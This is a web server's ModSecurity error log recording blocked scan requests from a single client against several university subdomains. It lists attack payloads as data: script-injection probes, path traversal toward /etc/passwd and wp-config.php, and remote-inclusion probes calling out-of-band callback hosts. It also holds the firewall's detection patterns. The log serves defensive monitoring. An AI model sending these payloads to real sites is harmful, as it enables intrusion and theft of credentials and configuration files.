[Tue Aug 29 11:55:53.950592 2023] [:error] [pid 2745] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:in\\\\s*?\\\\(+\\\\s*?select)|(?:(?:n?and|x?x?or|div|like|between|and|not |\\\\|\\\\||\\\\&\\\\&)\\\\s+[\\\\s\\\\w+]+(?:regexp\\\\s*?\\\\(|sounds\\\\s+like\\\\s*?[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98]|[=\\\\d]+x))|([\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98]\\\\s*?\\\\d\\\\s*?(?:--|#)) ..." at ARGS:bgColor. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "239"] [id "981246"] [msg "Detects basic SQL authentication bypass attempts 3/3"] [data "Matched Data: \\x22onload=\\x22 found within ARGS:bgColor: _000000\\x22onload=\\x22prompt(1)"] [severity "CRITICAL"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "informatika.unla.ac.id"] [uri "/Telerik.ReportViewer.axd"] [unique_id "ZO16WcCo-f0AAAq5@GwAAAAK"]
[Tue Aug 29 11:55:54.544601 2023] [:error] [pid 2730] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmnijtjmimvgniikdb0btrm6hxwt3cf5.oast.site found within TX:1: cjmnijtjmimvgniikdb0btrm6hxwt3cf5.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "www.unla.ac.id"] [uri "/umbraco/BackOffice/Api/Help/GetContextHelpForPage"] [unique_id "ZO16WsCo-f0AAAqqtksAAAAA"]
[Tue Aug 29 11:55:54.623466 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:in\\\\s*?\\\\(+\\\\s*?select)|(?:(?:n?and|x?x?or|div|like|between|and|not |\\\\|\\\\||\\\\&\\\\&)\\\\s+[\\\\s\\\\w+]+(?:regexp\\\\s*?\\\\(|sounds\\\\s+like\\\\s*?[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98]|[=\\\\d]+x))|([\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98]\\\\s*?\\\\d\\\\s*?(?:--|#)) ..." at ARGS:bgColor. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "239"] [id "981246"] [msg "Detects basic SQL authentication bypass attempts 3/3"] [data "Matched Data: \\x22onload=\\x22 found within ARGS:bgColor: _000000\\x22onload=\\x22prompt(1)"] [severity "CRITICAL"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/Telerik.ReportViewer.axd"] [unique_id "ZO16WsCo-f0AAAolKy8AAAAe"]
[Tue Aug 29 11:55:54.628181 2023] [:error] [pid 2744] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:msgId. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ')// found within ARGS:msgId: ';alert('document.domain')//"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/carbon/admin/login.jsp"] [unique_id "ZO16WsCo-f0AAAq4fZcAAAAJ"]
[Tue Aug 29 11:55:55.641514 2023] [:error] [pid 2753] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmnijtjmimvgniikdb09ae3yu84yeifh.oast.site/ found within TX:1: cjmnijtjmimvgniikdb09ae3yu84yeifh.oast.site/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "www.unla.ac.id"] [uri "/umbraco/backoffice/UmbracoApi/Dashboard/GetRemoteDashboardContent"] [unique_id "ZO16W8Co-f0AAArB1ssAAAAV"]
[Tue Aug 29 11:55:55.669009 2023] [:error] [pid 2707] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "unla.ac.id"] [uri "/"] [unique_id "ZO16W8Co-f0AAAqTvzwAAAAa"]
[Tue Aug 29 11:55:55.722345 2023] [:error] [pid 2754] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "informatika.unla.ac.id"] [uri "/"] [unique_id "ZO16W8Co-f0AAArC7bMAAAAW"]
[Tue Aug 29 11:55:55.723701 2023] [:error] [pid 2718] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "ft.unla.ac.id"] [uri "/"] [unique_id "ZO16W8Co-f0AAAqeFe4AAAAx"]
[Tue Aug 29 11:55:55.838348 2023] [:error] [pid 2754] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "pusatbahasa.unla.ac.id"] [uri "/"] [unique_id "ZO16W8Co-f0AAArC7bUAAAAW"]
[Tue Aug 29 11:55:55.839609 2023] [:error] [pid 2753] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "journal.unla.ac.id"] [uri "/"] [unique_id "ZO16W8Co-f0AAArB1s8AAAAV"]
[Tue Aug 29 11:55:56.576495 2023] [:error] [pid 2754] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:s. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:s: ax6zt\\x22><script>alert(document.domain)</script>y6uu6"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/"] [unique_id "ZO16XMCo-f0AAArC7bcAAAAW"]
[Tue Aug 29 11:55:56.576540 2023] [:error] [pid 2745] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:controller: ../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/index.php"] [unique_id "ZO16XMCo-f0AAAq5@HoAAAAK"]
[Tue Aug 29 11:55:56.577218 2023] [:error] [pid 2718] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:s. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:s: ax6zt\\x22><script>alert(document.domain)</script>y6uu6"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/"] [unique_id "ZO16XMCo-f0AAAqeFfEAAAAx"]
[Tue Aug 29 11:55:56.578441 2023] [:error] [pid 2651] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:s. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:s: ax6zt\\x22><script>alert(document.domain)</script>y6uu6"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/"] [unique_id "ZO16XMCo-f0AAApbUrYAAAAh"]
[Tue Aug 29 11:55:56.611167 2023] [:error] [pid 2750] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:controller: ../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16XMCo-f0AAAq@sbcAAAAM"]
[Tue Aug 29 11:55:56.623371 2023] [:error] [pid 2754] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:controller: ../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16XMCo-f0AAArC7bkAAAAW"]
[Tue Aug 29 11:55:56.660206 2023] [:error] [pid 2745] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:controller: ../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16XMCo-f0AAAq5@H4AAAAK"]
[Tue Aug 29 11:55:56.674239 2023] [:error] [pid 2712] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmnijtjmimvgniikdb06gg3p3hdypqcw.oast.site/ found within TX:1: cjmnijtjmimvgniikdb06gg3p3hdypqcw.oast.site/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "www.unla.ac.id"] [uri "/umbraco/backoffice/UmbracoApi/Dashboard/GetRemoteDashboardCss"] [unique_id "ZO16XMCo-f0AAAqY6NMAAAAr"]
[Tue Aug 29 11:55:56.692613 2023] [:error] [pid 2651] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:s. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:s: ax6zt\\x22><script>alert(document.domain)</script>y6uu6"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/"] [unique_id "ZO16XMCo-f0AAApbUroAAAAh"]
[Tue Aug 29 11:55:56.733416 2023] [:error] [pid 2750] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:s. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:s: ax6zt\\x22><script>alert(document.domain)</script>y6uu6"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/"] [unique_id "ZO16XMCo-f0AAAq@sbwAAAAM"]
[Tue Aug 29 11:55:56.734392 2023] [:error] [pid 2651] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:controller: ../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16XMCo-f0AAApbUrwAAAAh"]
[Tue Aug 29 11:55:57.557183 2023] [:error] [pid 2718] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:s. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:s: ax6zt\\x22><script>alert(document.domain)</script>y6uu6"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZO16XcCo-f0AAAqeFfoAAAAx"]
[Tue Aug 29 11:55:57.573177 2023] [:error] [pid 2707] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:controller: ../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16XcCo-f0AAAqTv0IAAAAa"]
[Tue Aug 29 11:55:57.577222 2023] [:error] [pid 2706] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:file: ../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/wp-content/plugins/db-backup/download.php"] [unique_id "ZO16XcCo-f0AAAqSw2sAAAAN"]
[Tue Aug 29 11:55:57.599443 2023] [:error] [pid 2745] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:file: ../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/wp-content/plugins/db-backup/download.php"] [unique_id "ZO16XcCo-f0AAAq5@IUAAAAK"]
[Tue Aug 29 11:55:57.600830 2023] [:error] [pid 2718] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:file: ../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/wp-content/plugins/db-backup/download.php"] [unique_id "ZO16XcCo-f0AAAqeFfwAAAAx"]
[Tue Aug 29 11:55:57.602689 2023] [:error] [pid 2707] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:file: ../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/db-backup/download.php"] [unique_id "ZO16XcCo-f0AAAqTv0MAAAAa"]
[Tue Aug 29 11:55:57.627006 2023] [:error] [pid 2754] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:file: ../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-content/plugins/db-backup/download.php"] [unique_id "ZO16XcCo-f0AAArC7cEAAAAW"]
[Tue Aug 29 11:55:57.628505 2023] [:error] [pid 2745] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZO16XcCo-f0AAAq5@IYAAAAK"]
[Tue Aug 29 11:55:58.612536 2023] [:error] [pid 2651] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "unla.ac.id"] [uri "/webmail/basic/"] [unique_id "ZO16XsCo-f0AAApbUsEAAAAh"]
[Tue Aug 29 11:55:58.619318 2023] [:error] [pid 2754] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "pusatbahasa.unla.ac.id"] [uri "/webmail/basic/"] [unique_id "ZO16XsCo-f0AAArC7cYAAAAW"]
[Tue Aug 29 11:55:58.624807 2023] [:error] [pid 2745] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "informatika.unla.ac.id"] [uri "/webmail/basic/"] [unique_id "ZO16XsCo-f0AAAq5@IwAAAAK"]
[Tue Aug 29 11:55:58.669718 2023] [:error] [pid 2651] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "ft.unla.ac.id"] [uri "/webmail/basic/"] [unique_id "ZO16XsCo-f0AAApbUsIAAAAh"]
[Tue Aug 29 11:55:58.686511 2023] [:error] [pid 2750] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "journal.unla.ac.id"] [uri "/webmail/basic/"] [unique_id "ZO16XsCo-f0AAAq@scEAAAAM"]
